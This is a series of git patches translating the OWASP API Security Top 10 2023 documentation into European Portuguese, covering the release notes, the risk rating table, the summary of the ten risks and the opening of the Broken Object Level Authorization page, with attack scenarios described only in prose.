 * [OWASP Desktop App Security Top 10][3]
@@ -34,15 +34,14 @@ least the following top 10 projects:
 * [OWASP Top 10 Privacy Risks][11]
 * [OWASP Serverless Top 10][12]
 
-None of the projects replaces another: if you're working on a mobile application
-powered by a back-end API, you're better off reading both the corresponding top
-10's. The same is valid if you're working on a web or desktop application
-powered by APIs.
+Nenhum destes projetos substitui qualquer outro: se está a trabalhar numa
+aplicação móvel alimentada por uma API, então é melhor ler os dois documentos
+Top 10 correspondentes. O mesmo é válido se estiver a trabalhar num website ou
+numa aplicação desktop alimentados por APIs.
 
-In the [Methodology and Data][13] section, you can read more about how this
-edition was created. For now, we encourage everyone to contribute with
-questions, comments, and ideas at our [GitHub repository][14] or
-[Mailing list][15].
+Na secção [Metodologia e Dados][13] pode ler mais sobre como esta edição foi
+criada. Por agora encorajamos todos a contribuírem com perguntas, comentários e
+ideias no nosso [repositório no GitHub][14] ou através da [_Mailing list_][15].
 
 [1]: https://owasp.org/www-project-api-security/
 [2]: https://owasp.org/www-project-cloud-native-application-security-top-10/
From 4450656e5238ec389c8ef974aa7290a0314b910e Mon Sep 17 00:00:00 2001
From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com>
Date: Sun, 17 Dec 2023 19:12:58 +0000
Subject: [PATCH 08/64] fix language typo

---
 editions/2019/mkdocs.yml | 4 ++--
 editions/2023/mkdocs.yml | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/editions/2019/mkdocs.yml b/editions/2019/mkdocs.yml
index ccc52dbba..d78a30bd6 100644
--- a/editions/2019/mkdocs.yml
+++ b/editions/2019/mkdocs.yml
@@ -15,9 +15,9 @@ extra:
 lang: fr
 - name: Greek (Greece)
 lang: el-gr
- - name: Portugês (Brasil)
+ - name: Português (Brasil)
 lang: pt-BR
- - name: Portugês (Portugal)
+ - name: Português (Portugal)
 lang: pt-pt
 - name: Russian
 lang: ru
diff --git a/editions/2023/mkdocs.yml b/editions/2023/mkdocs.yml
index 4f9537dc8..d66330398 100644
--- a/editions/2023/mkdocs.yml
+++ b/editions/2023/mkdocs.yml
@@ -6,5 +6,5 @@ extra:
 - name: English
 lang: en
 alternate:
- - name: Portugês (Portugal)
+ - name: Português (Portugal)
 lang: pt-pt
From 262d9772afbd8cb4338798f43390901ea02fad22 Mon Sep 17 00:00:00 2001
From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com>
Date: Fri, 29 Dec 2023 11:18:53 +0000
Subject: [PATCH 09/64] 0x04-release-notes.md paragraph

---
 editions/2023/pt-pt/0x04-release-notes.md | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)

diff --git a/editions/2023/pt-pt/0x04-release-notes.md b/editions/2023/pt-pt/0x04-release-notes.md
index bff6dc01c..2a0fb0809 100644
--- a/editions/2023/pt-pt/0x04-release-notes.md
+++ b/editions/2023/pt-pt/0x04-release-notes.md
@@ -1,12 +1,12 @@
-# Release Notes
-
-This is the second edition of the OWASP API Security Top 10 edition, exactly
-four years after its first release. A lot has changed in the API (security)
-scene. API traffic increased at a fast pace, some API protocols gained a lot
-more traction, many new API security vendors/solutions have popped up, and, of
-course, attackers have developed new skills and techniques to compromise
-APIs. It was about time to get the list of the ten most critical API security
-risks updated.
+# Notas da Versão
+
+Esta é a segunda edição do OWASP API Security Top 10, exatamente quatro anos
+após a primeira versão. Muito mudou no panorama das API (a nível de
+segurança). O tráfego das API aumentou a um ritmo acelerado, alguns protocolos
+de API ganharam muito mais popularidade, surgiram muitos novos vendedores/
+soluções de segurança para API e, claro, os atacantes desenvolveram novas
+capacidades e técnicas para comprometer APIs. Já era hora de atualizar a lista
+dos dez riscos de segurança de API mais críticos.
 
 With a more mature API security industry, for the first time, there was [a
 public call for data][1]. Unfortunately, no data was contributed, but based on
From 362fb1995ca1387679e4b2dc9d2d19522b588a5f Mon Sep 17 00:00:00 2001
From: Rui Silva <11950757+RiuSalvi@users.noreply.github.com>
Date: Sat, 30 Dec 2023 12:00:33 +0000
Subject: [PATCH 10/64] 0x04-release-notes.md paragraph 2

---
 editions/2023/pt-pt/0x04-release-notes.md | 15 ++++++++-------
 1 file changed, 8 insertions(+), 7 deletions(-)

diff --git a/editions/2023/pt-pt/0x04-release-notes.md b/editions/2023/pt-pt/0x04-release-notes.md
index 2a0fb0809..50cc9a0bf 100644
--- a/editions/2023/pt-pt/0x04-release-notes.md
+++ b/editions/2023/pt-pt/0x04-release-notes.md
@@ -8,13 +8,14 @@ soluções de segurança para API e, claro, os atacantes desenvolveram novas
 capacidades e técnicas para comprometer APIs. Já era hora de atualizar a lista
 dos dez riscos de segurança de API mais críticos.
 
-With a more mature API security industry, for the first time, there was [a
-public call for data][1]. Unfortunately, no data was contributed, but based on
-the project's team experience, careful API security specialist review, and
-community feedback on the release candidate, we built this new list. In the
-[Methodology and Data section][2], you'll find more details about how this
-version was built. For more details about the security risks please refer to the
-[API Security Risks section][3].
+Com uma indústria de segurança de API mais madura, pela primeira vez, houve [um
+ apelo público para dados][1]. Infelizmente, não foram fornecidos dados, mas
+ com base na experiência da equipa do projeto, numa análise cuidadosa por
+ especialistas em segurança de API e no feedback da comunidade sobre a versão
+ preliminar, construímos esta nova lista. Na [secção Metodologia e Dados][2],
+ encontrará mais detalhes sobre como esta versão foi elaborada. Para mais
+ detalhes sobre os riscos de segurança, consulte a [secção Riscos de Segurança
+ em APIs][3].
 
 The OWASP API Security Top 10 2023 is a forward-looking awareness document for
 a fast pace industry. It does not replace other TOP 10's. In this edition:
From 9a6a8dbdd1559bd52450948b8034b2987b1d7054 Mon Sep 17 00:00:00 2001
From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Fri, 19 Apr 2024 15:32:56 +0100
Subject: [PATCH 11/64] Update 0x01-about-owasp.md

---
 editions/2023/pt-pt/0x01-about-owasp.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/editions/2023/pt-pt/0x01-about-owasp.md b/editions/2023/pt-pt/0x01-about-owasp.md
index 5027f41dd..a9b862987 100644
--- a/editions/2023/pt-pt/0x01-about-owasp.md
+++ b/editions/2023/pt-pt/0x01-about-owasp.md
@@ -43,7 +43,7 @@ segurança através de bolsas e infraestrutura.
 
 Junte-se a nós!
 
-## Copyright and License
+## Direitos de Autor e Licença
 
 ![license](images/license.png)
 
From 3c91411cf7e7fedc6030e983805b1c73d3680c42 Mon Sep 17 00:00:00 2001
From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Fri, 19 Apr 2024 16:38:51 +0100
Subject: [PATCH 12/64] Update 0x04-release-notes.md

---
 editions/2023/pt-pt/0x04-release-notes.md | 66 +++++++++++------------
 1 file changed, 33 insertions(+), 33 deletions(-)

diff --git a/editions/2023/pt-pt/0x04-release-notes.md b/editions/2023/pt-pt/0x04-release-notes.md
index 50cc9a0bf..a2d8274bb 100644
--- a/editions/2023/pt-pt/0x04-release-notes.md
+++ b/editions/2023/pt-pt/0x04-release-notes.md
@@ -8,39 +8,39 @@ soluções de segurança para API e, claro, os atacantes desenvolveram novas
 capacidades e técnicas para comprometer APIs. Já era hora de atualizar a lista
 dos dez riscos de segurança de API mais críticos.
 
-Com uma indústria de segurança de API mais madura, pela primeira vez, houve [um
- apelo público para dados][1]. Infelizmente, não foram fornecidos dados, mas
- com base na experiência da equipa do projeto, numa análise cuidadosa por
- especialistas em segurança de API e no feedback da comunidade sobre a versão
- preliminar, construímos esta nova lista. Na [secção Metodologia e Dados][2],
- encontrará mais detalhes sobre como esta versão foi elaborada. Para mais
- detalhes sobre os riscos de segurança, consulte a [secção Riscos de Segurança
- em APIs][3].
-
-The OWASP API Security Top 10 2023 is a forward-looking awareness document for
-a fast pace industry. It does not replace other TOP 10's. In this edition:
-
-* We've combined Excessive Data Exposure and Mass Assignment focusing on the
- common root cause: object property level authorization validation failures.
-* We've put more emphasis on resource consumption, over focusing on the pace
- they are exhausted.
-* We've created a new category "Unrestricted Access to Sensitive Business Flows"
- to address new threats, including most of those that can be mitigated using
- rate limiting.
-* We added "Unsafe Consumption of APIs" to address something we've started
- seeing: attackers have started looking for a target's integrated services to
- compromise those, instead of hitting the APIs of their target directly. This
- is the right time to start creating awareness about this increasing risk.
-
-APIs play an increasingly important role in modern microservices architecture,
-Single Page Applications (SPAs), mobile apps, IoT, etc. The OWASP API Security
-Top 10 is a required effort to create awareness about modern API security
-issues.
-
-This update was only possible due to the great effort of several volunteers,
-listed in the [Acknowledgments][4] section.
-
-Thank you!
+Com uma indústria de segurança de API mais madura, pela primeira vez, houve [um
+apelo público para dados][1]. Infelizmente, não foram fornecidos dados, mas
+com base na experiência da equipa do projeto, numa análise cuidadosa por
+especialistas em segurança de API e no feedback da comunidade sobre a versão
+preliminar, construímos esta nova lista. Na [secção Metodologia e Dados][2],
+encontrará mais detalhes sobre como esta versão foi elaborada. Para mais
+detalhes sobre os riscos de segurança, consulte a [secção Riscos de Segurança
+em APIs][3].
+
+O OWASP API Security Top 10 2023 é um documento de sensibilização prospetivo
+para uma indústria de ritmo acelerado. Não substitui outros TOP 10. Nesta edição:
+
+* Combinámos *Excessive Data Exposure* e *Mass Assignment*, focando na causa
+ comum: falhas na validação de autorização ao nível das propriedades do objeto.
+* Damos mais ênfase ao consumo de recursos, em vez de nos concentrarmos na rapidez
+ com que são esgotados.
+* Criámos uma nova categoria "*Unrestricted Access to Sensitive Business Flows*"
+ para abordar novas ameaças, incluindo a maioria daquelas que podem ser mitigadas
+ através de *rate limiting*.
+* Adicionámos "*Unsafe Consumption of APIs*" para abordar algo que começámos a
+ observar: os atacantes começaram a procurar serviços integrados de um alvo para
+ os comprometer, em vez de atingirem diretamente as APIs do seu alvo. Este é o
+ momento certo para começar a sensibilizar sobre este risco crescente.
+
+As APIs desempenham um papel cada vez mais importante na arquitetura moderna de
+microsserviços, *Single Page Applications* (SPAs), aplicações móveis, Internet das
+Coisas (IoT), etc. O OWASP API Security Top 10 é um esforço necessário para criar
+sensibilização sobre os problemas de segurança modernos das APIs.
+
+Esta atualização só foi possível devido ao grande esforço de vários voluntários,
+listados na secção de [Agradecimentos][4].
+
+Obrigado!
 
 [1]: https://owasp.org/www-project-api-security/announcements/cfd/2022/
 [2]: ./0xd0-about-data.md
From 73d1865577e0614206357f2c79fb9cf1a2569225 Mon Sep 17 00:00:00 2001
From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Fri, 19 Apr 2024 17:00:36 +0100
Subject: [PATCH 13/64] Update 0x10-api-security-risks.md

---
 .../2023/pt-pt/0x10-api-security-risks.md | 42 ++++++++++---------
 1 file changed, 22 insertions(+), 20 deletions(-)

diff --git a/editions/2023/pt-pt/0x10-api-security-risks.md b/editions/2023/pt-pt/0x10-api-security-risks.md
index c9d284b14..7efa9b041 100644
--- a/editions/2023/pt-pt/0x10-api-security-risks.md
+++ b/editions/2023/pt-pt/0x10-api-security-risks.md
@@ -1,27 +1,29 @@
-# API Security Risks
+# Riscos de Segurança em APIs
 
-The [OWASP Risk Rating Methodology][1] was used to do the risk analysis.
+Para a análise de risco usámos a [metodologia de avaliação de risco da
+OWASP][1].
 
-The table below summarizes the terminology associated with the risk score.
+A tabela seguinte resume a terminologia associada à pontuação correspondente ao
+nível de risco.
 
-| Threat Agents | Exploitability | Weakness Prevalence | Weakness Detectability | Technical Impact | Business Impacts |
+| Agentes Ameaça | Abuso | Prevalência | Deteção | Impacto Técnico | Impacto Negócio |
 | :-: | :-: | :-: | :-: | :-: | :-: |
-| API Specific | Easy: **3** | Widespread **3** | Easy **3** | Severe **3** | Business Specific |
-| API Specific | Average: **2** | Common **2** | Average **2** | Moderate **2** | Business Specific |
-| API Specific | Difficult: **1** | Difficult **1** | Difficult **1** | Minor **1** | Business Specific |
-
-**Note**: This approach does not take the likelihood of the threat agent into
-account. Nor does it account for any of the various technical details associated
-with your particular application. Any of these factors could significantly
-affect the overall likelihood of an attacker finding and exploiting a particular
-vulnerability. This rating does not take into account the actual impact on your
-business. Your organization will have to decide how much security risk from
-applications and APIs the organization is willing to accept given your culture,
-industry, and regulatory environment. The purpose of the OWASP API Security Top
-10 is not to do this risk analysis for you. Since this edition is not
-data-driven, prevalence results from a consensus among the team members.
-
-## References
+| Específico da API | Fácil **3** | Predominante **3** | Fácil **3** | Grave **3** | Específico do Negócio |
+| Específico da API | Moderado **2** | Comum **2** | Moderado **2** | Moderado **2** | Específico do Negócio |
+| Específico da API | Difícil **1** | Incomum **1** | Difícil **1** | Reduzido **1** | Específico do Negócio |
+
+**Nota**: Esta abordagem não toma em consideração a probabilidade do Agente de
+Ameaça. Também não toma em consideração nenhum detalhe técnico associado à sua
+API. Qualquer um destes fatores podem ter impacto significativo na probabilidade
+de um atacante encontrar e abusar duma falha de segurança particular. Estes
+indicadores não tomam em consideração o impacto atual no seu negócio. Terá de
+ser a sua organização a decidir qual o nível de risco para a segurança das suas
+aplicações e APIs que está disposta a aceitar, baseado na cultura, indústria e
+regulação a que está sujeita. O propósito do OWASP API Security Top 10 não é
+fazer essa análise por si. Uma vez que esta edição não é baseada em dados, a
+prevalência resulta de um consenso entre os membros da equipa.
+
+## Referências
 
 ### OWASP
 
From dced7be6c90684984d691e8d4b5f95f3a9e2446b Mon Sep 17 00:00:00 2001
From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Mon, 22 Apr 2024 13:24:34 +0100
Subject: [PATCH 14/64] Update 0x10-api-security-risks.md

---
 editions/2023/pt-pt/0x10-api-security-risks.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/editions/2023/pt-pt/0x10-api-security-risks.md b/editions/2023/pt-pt/0x10-api-security-risks.md
index 7efa9b041..41ab360a5 100644
--- a/editions/2023/pt-pt/0x10-api-security-risks.md
+++ b/editions/2023/pt-pt/0x10-api-security-risks.md
@@ -30,7 +30,7 @@ prevalência resulta de um consenso entre os membros da equipa.
 * [OWASP Risk Rating Methodology][1]
 * [Article on Threat/Risk Modeling][2]
 
-### External
+### Externas
 
 * [ISO 31000: Risk Management Std][3]
 * [ISO 27001: ISMS][4]
From 71f0db5f8e62ce623f4ac3c48ea842752519cff7 Mon Sep 17 00:00:00 2001
From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Mon, 22 Apr 2024 17:06:37 +0100
Subject: [PATCH 15/64] Update 0x11-t10.md partial

---
 editions/2023/pt-pt/0x11-t10.md | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/editions/2023/pt-pt/0x11-t10.md b/editions/2023/pt-pt/0x11-t10.md
index 230cc8c72..ac79c8baf 100644
--- a/editions/2023/pt-pt/0x11-t10.md
+++ b/editions/2023/pt-pt/0x11-t10.md
@@ -2,14 +2,14 @@
 
 | Risk | Description |
 | ---- | ----------- |
-| [API1:2023 - Broken Object Level Authorization][api1] | APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface of Object Level Access Control issues. Object level authorization checks should be considered in every function that accesses a data source using an ID from the user. |
-| [API2:2023 - Broken Authentication][api2] | Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or to exploit implementation flaws to assume other user's identities temporarily or permanently. Compromising a system's ability to identify the client/user, compromises API security overall. |
-| [API3:2023 - Broken Object Property Level Authorization][api3] | This category combines [API3:2019 Excessive Data Exposure][1] and [API6:2019 - Mass Assignment][2], focusing on the root cause: the lack of or improper authorization validation at the object property level. This leads to information exposure or manipulation by unauthorized parties. |
-| [API4:2023 - Unrestricted Resource Consumption][api4] | Satisfying API requests requires resources such as network bandwidth, CPU, memory, and storage. Other resources such as emails/SMS/phone calls or biometrics validation are made available by service providers via API integrations, and paid for per request. Successful attacks can lead to Denial of Service or an increase of operational costs. |
-| [API5:2023 - Broken Function Level Authorization][api5] | Complex access control policies with different hierarchies, groups, and roles, and an unclear separation between administrative and regular functions, tend to lead to authorization flaws. By exploiting these issues, attackers can gain access to other users’ resources and/or administrative functions. |
-| [API6:2023 - Unrestricted Access to Sensitive Business Flows][api6] | APIs vulnerable to this risk expose a business flow - such as buying a ticket, or posting a comment - without compensating for how the functionality could harm the business if used excessively in an automated manner. This doesn't necessarily come from implementation bugs. |
-| [API7:2023 - Server Side Request Forgery][api7] | Server-Side Request Forgery (SSRF) flaws can occur when an API is fetching a remote resource without validating the user-supplied URI. This enables an attacker to coerce the application to send a crafted request to an unexpected destination, even when protected by a firewall or a VPN. |
-| [API8:2023 - Security Misconfiguration][api8] | APIs and the systems supporting them typically contain complex configurations, meant to make the APIs more customizable. Software and DevOps engineers can miss these configurations, or don't follow security best practices when it comes to configuration, opening the door for different types of attacks. |
+| [API1:2023 - Broken Object Level Authorization][api1] | As APIs tendem a expor mais _endpoints_ que manipulam identificadores de objetos, tornando as falhas no controlo de acessos mais suscetíveis a ataques. A verificação da autorização para acesso aos objetos deve ser tida em consideração em todas as funções que acedem a dados com base em informação fornecida pelo utilizador.|
+| [API2:2023 - Broken Authentication][api2] | Com frequência os mecanismos de autenticação são implementados de forma incorreta, permitindo aos atacantes comprometer os _tokens_ de autenticação ou abusar das falhas na implementação por forma a assumir a identidade de outros utilizadores de forma temporária ou permanente. |
+| [API3:2023 - Broken Object Property Level Authorization][api3] | Esta categoria combina [API3:2019 - Excessive Data Exposure][1] e [API6:2019 - Mass Assignment][2], focando na causa principal: a falta de validação de autorização adequada ao nível das propriedades do objeto. Isso leva à exposição ou manipulação de informações por partes não autorizadas. |
+| [API4:2023 - Unrestricted Resource Consumption][api4] | Satisfazer pedidos de API requer recursos como largura de banda de rede, CPU, memória e armazenamento. Outros recursos como emails/SMS/chamadas telefónicas ou validação biométrica são disponibilizados por fornecedores de serviços através de integrações de API, sendo pagos por pedido. Ataques bem-sucedidos podem levar a uma negação do serviço (DoS) ou a um aumento dos custos operacionais. |
+| [API5:2023 - Broken Function Level Authorization][api5] | Políticas de controlo de acesso complexas com diferentes níveis hierárquicos, grupos e perfis e uma não tão clara separação entre o que são ou não funcionalidades administrativas tendem a conduzir a falhas de autorização. Abusando destas falhas os atacantes podem ganhar acesso a recursos de outros utilizadores e/ou a funcionalidades administrativas. |
+| [API6:2023 - Unrestricted Access to Sensitive Business Flows][api6] | As APIs vulneráveis a este risco expõem um fluxo de negócio - como comprar um bilhete ou publicar um comentário - sem compensar por como a funcionalidade poderia prejudicar o negócio se fosse usada de forma excessiva e automatizada. Isto não resulta necessariamente de falhas de implementação. |
+| [API7:2023 - Server Side Request Forgery][api7] | As falhas de Server-Side Request Forgery (SSRF) podem ocorrer quando uma API está a obter um recurso remoto sem validar o URI fornecido pelo utilizador. Isto permite que um atacante force a aplicação a enviar um pedido manipulado para um destino inesperado, mesmo quando protegido por um firewall ou uma VPN. |
+| [API8:2023 - Security Misconfiguration][api8] | As APIs e os sistemas que as suportam normalmente contêm configurações complexas, destinadas a tornar as APIs mais personalizáveis. Os engenheiros de software e de DevOps podem ignorar essas configurações ou não seguir as melhores práticas de segurança quando se trata de configuração, abrindo a porta para diferentes tipos de ataques. |
 | [API9:2023 - Improper Inventory Management][api9] | APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. A proper inventory of hosts and deployed API versions also are important to mitigate issues such as deprecated API versions and exposed debug endpoints. |
 | [API10:2023 - Unsafe Consumption of APIs][api10] | Developers tend to trust data received from third-party APIs more than user input, and so tend to adopt weaker security standards. In order to compromise APIs, attackers go after integrated third-party services instead of trying to compromise the target API directly. |
 
From f6322fd25c5a79f8b33d6edd97b6f3d9b080ee3d Mon Sep 17 00:00:00 2001
From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com>
Date: Tue, 23 Apr 2024 10:45:55 +0100
Subject: [PATCH 16/64] Update 0x11-t10.md

---
 editions/2023/pt-pt/0x11-t10.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/editions/2023/pt-pt/0x11-t10.md b/editions/2023/pt-pt/0x11-t10.md
index ac79c8baf..84612e31b 100644
--- a/editions/2023/pt-pt/0x11-t10.md
+++ b/editions/2023/pt-pt/0x11-t10.md
@@ -10,8 +10,8 @@ | [API6:2023 - Unrestricted Access to Sensitive Business Flows][api6] | As APIs vulneráveis a este risco expõem um fluxo de negócio - como comprar um bilhete ou publicar um comentário - sem compensar por como a funcionalidade poderia prejudicar o negócio se fosse usada de forma excessiva e automatizada. Isto não resulta necessariamente de falhas de implementação. | | [API7:2023 - Server Side Request Forgery][api7] | As falhas de Server-Side Request Forgery (SSRF) podem ocorrer quando uma API está a obter um recurso remoto sem validar o URI fornecido pelo utilizador. Isto permite que um atacante force a aplicação a enviar um pedido manipulado para um destino inesperado, mesmo quando protegido por um firewall ou uma VPN. | | [API8:2023 - Security Misconfiguration][api8] | As APIs e os sistemas que as suportam normalmente contêm configurações complexas, destinadas a tornar as APIs mais personalizáveis. Os engenheiros de software e de DevOps podem ignorar essas configurações ou não seguir as melhores práticas de segurança quando se trata de configuração, abrindo a porta para diferentes tipos de ataques. | -| [API9:2023 - Improper Inventory Management][api9] | APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. A proper inventory of hosts and deployed API versions also are important to mitigate issues such as deprecated API versions and exposed debug endpoints. | -| [API10:2023 - Unsafe Consumption of APIs][api10] | Developers tend to trust data received from third-party APIs more than user input, and so tend to adopt weaker security standards. In order to compromise APIs, attackers go after integrated third-party services instead of trying to compromise the target API directly. | +| [API9:2023 - Improper Inventory Management][api9] | As APIs tendem a expor mais _endpoints_ do que as aplicações web tradicionais, fazendo com que a documentação se torne ainda mais importante. 
Um inventário dos _hosts_ e APIs em execução também têm um papel importante na mitigação de falhas tais como versões de APIs descontinuadas e exposição de _endpoints_ para análise de problemas. | +| [API10:2023 - Unsafe Consumption of APIs][api10] | Os programadores tendem a confiar mais nos dados recebidos de APIs de terceiros do que os fornecidos pelo utilizador, e por isso tendem a adotar padrões de segurança mais fracos. Para comprometer APIs, os atacantes visam os serviços de terceiros integrados em vez de tentarem comprometer a API alvo diretamente. | [1]: https://owasp.org/API-Security/editions/2019/en/0xa3-excessive-data-exposure/ [2]: https://owasp.org/API-Security/editions/2019/en/0xa6-mass-assignment/ From c59fa30c0fc27d1a0d8ebe46244d14216150a9ce Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 15:05:59 +0100 Subject: [PATCH 17/64] Update 0xa1-broken-object-level-authorization.md --- .../2023/pt-pt/0xa1-broken-object-level-authorization.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md index be629d9c8..42ffc88fa 100644 --- a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md +++ b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md 
@@ -1,9 +1,9 @@ # API1:2023 Broken Object Level Authorization -| Threat agents/Attack vectors | Security Weakness | Impacts | +| Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | -| API Specific : Exploitability **Easy** | Prevalence **Widespread** : Detectability **Easy** | Technical **Moderate** : Business Specific | -| Attackers can exploit API endpoints that are vulnerable to broken object-level authorization by manipulating the ID of an object that is sent within the request. Object IDs can be anything from sequential integers, UUIDs, or generic strings. Regardless of the data type, they are easy to identify in the request target (path or query string parameters), request headers, or even as part of the request payload. | This issue is extremely common in API-based applications because the server component usually does not fully track the client’s state, and instead, relies more on parameters like object IDs, that are sent from the client to decide which objects to access. The server response is usually enough to understand whether the request was successful. | Unauthorized access to other users’ objects can result in data disclosure to unauthorized parties, data loss, or data manipulation. Under certain circumstances, unauthorized access to objects can also lead to full account takeover. | +| Específico da API : Abuso **Fácil** | Prevalência **Predominante** : Deteção **Fácil** | Técnico **Moderado** : Específico do Negócio | +| Os atacantes podem explorar endpoints de API vulneráveis a *broken object-level authorization* ao manipular o ID de um objeto enviado no pedido. Os IDs de objetos podem ser números inteiros sequenciais, UUIDs ou *strings* genéricas. Independentemente do tipo de dado, são fáceis de identificar no alvo do pedido (parâmetros do caminho ou da *string* de consulta), cabeçalhos do pedido ou até mesmo como parte do conteúdo do pedido. 
| Este problema é extremamente comum em aplicações baseadas em API porque o componente do servidor geralmente não acompanha completamente o estado do cliente e, em vez disso, confia mais em parâmetros como IDs de objetos, que são enviados pelo cliente para decidir a quais objetos aceder. A resposta do servidor geralmente é suficiente para entender se o pedido foi bem sucedido. | O acesso não autorizado a objetos de outros utilizadores pode resultar na divulgação de dados a partes não autorizadas, perda de dados ou manipulação de dados. Em certas circunstâncias, o acesso não autorizado a objetos também pode resultar na apropriação completa da conta. | ## Is the API Vulnerable? From eb9e10cd89d55eef21f39d6f238a593d82f27009 Mon Sep 17 00:00:00 2001 From: OWASP Disciple <11950757+RiuSalvi@users.noreply.github.com> Date: Tue, 23 Apr 2024 15:36:45 +0100 Subject: [PATCH 18/64] Update 0xa1-broken-object-level-authorization.md --- .../0xa1-broken-object-level-authorization.md | 54 +++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md index 42ffc88fa..14f5f6e91 100644 --- a/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md +++ b/editions/2023/pt-pt/0xa1-broken-object-level-authorization.md 
@@ -3,36 +3,36 @@ | Agentes Ameaça/Vetores Ataque | Falha Segurança | Impactos | | - | - | - | | Específico da API : Abuso **Fácil** | Prevalência **Predominante** : Deteção **Fácil** | Técnico **Moderado** : Específico do Negócio | -| Os atacantes podem explorar endpoints de API vulneráveis a *broken object-level authorization* ao manipular o ID de um objeto enviado no pedido. Os IDs de objetos podem ser números inteiros sequenciais, UUIDs ou *strings* genéricas. Independentemente do tipo de dado, são fáceis de identificar no alvo do pedido (parâmetros do caminho ou da *string* de consulta), cabeçalhos do pedido ou até mesmo como parte do conteúdo do pedido. | Este problema é extremamente comum em aplicações baseadas em API porque o componente do servidor geralmente não acompanha completamente o estado do cliente e, em vez disso, confia mais em parâmetros como IDs de objetos, que são enviados pelo cliente para decidir a quais objetos aceder. A resposta do servidor geralmente é suficiente para entender se o pedido foi bem sucedido. | O acesso não autorizado a objetos de outros utilizadores pode resultar na divulgação de dados a partes não autorizadas, perda de dados ou manipulação de dados. Em certas circunstâncias, o acesso não autorizado a objetos também pode resultar na apropriação completa da conta. | +| Os atacantes podem explorar *endpoints* de API vulneráveis a *broken object-level authorization* ao manipular o ID de um objeto enviado no pedido. Os IDs de objetos podem ser números inteiros sequenciais, UUIDs ou *strings* genéricas. Independentemente do tipo de dado, são fáceis de identificar no alvo do pedido (parâmetros do caminho ou da *string* de consulta), cabeçalhos do pedido ou até mesmo como parte do conteúdo do pedido. 
| Este problema é extremamente comum em aplicações baseadas em API porque o componente do servidor geralmente não acompanha completamente o estado do cliente e, em vez disso, confia mais em parâmetros como IDs de objetos, que são enviados pelo cliente para decidir a quais objetos aceder. A resposta do servidor geralmente é suficiente para entender se o pedido foi bem sucedido. | O acesso não autorizado a objetos de outros utilizadores pode resultar na divulgação de dados a partes não autorizadas, perda de dados ou manipulação de dados. Em certas circunstâncias, o acesso não autorizado a objetos também pode resultar na apropriação completa da conta. | -## Is the API Vulnerable? +## A API é vulnerável? -Object level authorization is an access control mechanism that is usually -implemented at the code level to validate that a user can only access the -objects that they should have permissions to access. +A autorização de acesso ao nível do objeto é um mecanismo de controlo que +geralmente é implementado ao nível do código para validar que um utilizador +só pode aceder aos objetos aos quais deveria ter permissão para aceder. -Every API endpoint that receives an ID of an object, and performs any action -on the object, should implement object-level authorization checks. The checks -should validate that the logged-in user has permissions to perform the -requested action on the requested object. +Cada *endpoint* de API que recebe um ID de um objeto e realiza alguma ação +sobre o objeto deve implementar verificações de autorização ao nível do +objeto. As verificações devem validar que o utilizador autenticado tem +permissões para realizar a ação solicitada sobre o objeto alvo. -Failures in this mechanism typically lead to unauthorized information -disclosure, modification, or destruction of all data. +As falhas neste mecanismo geralmente conduzem à divulgação não autorizada de +informações, modificação ou destruição de todos os dados. 
-Comparing the user ID of the current session (e.g. by extracting it from the -JWT token) with the vulnerable ID parameter isn't a sufficient solution to -solve Broken Object Level Authorization (BOLA). This approach could address -only a small subset of cases. +Comparar o ID do utilizador da sessão atual (por exemplo, ao extraí-lo do +token JWT) com o parâmetro de ID vulnerável não é uma solução suficiente +para resolver a falha de Broken Object Level Authorization (BOLA). Esta +abordagem pode endereçar apenas um pequeno subconjunto de casos. -In the case of BOLA, it's by design that the user will have access to the -vulnerable API endpoint/function. The violation happens at the object level, -by manipulating the ID. If an attacker manages to access an API -endpoint/function they should not have access to - this is a case of [Broken -Function Level Authorization][5] (BFLA) rather than BOLA. +No caso de BOLA, é por design que o utilizador tem acesso ao +*endpoint*/função da API vulnerável. A violação ocorre ao nível do objeto, +através da manipulação do ID. Se um atacante conseguir aceder a um +*endpoint*/função da API ao qual não deveria ter acesso - este é um caso de +[Broken Function Level Authorization][5] (BFLA) em vez de BOLA. -## Example Attack Scenarios +## Exemplos de Cenários de Ataque -### Scenario #1 +### Cenário #1 An e-commerce platform for online stores (shops) provides a listing page with the revenue charts for their hosted shops. Inspecting the browser requests, an @@ -43,7 +43,7 @@ simple script to manipulate the names in the list, replacing `{shopName}` in the URL, the attacker gains access to the sales data of thousands of e-commerce stores. -### Scenario #2 +### Cenário #2 An automobile manufacturer has enabled remote control of its vehicles via a mobile API for communication with the driver's mobile phone. The API enables 
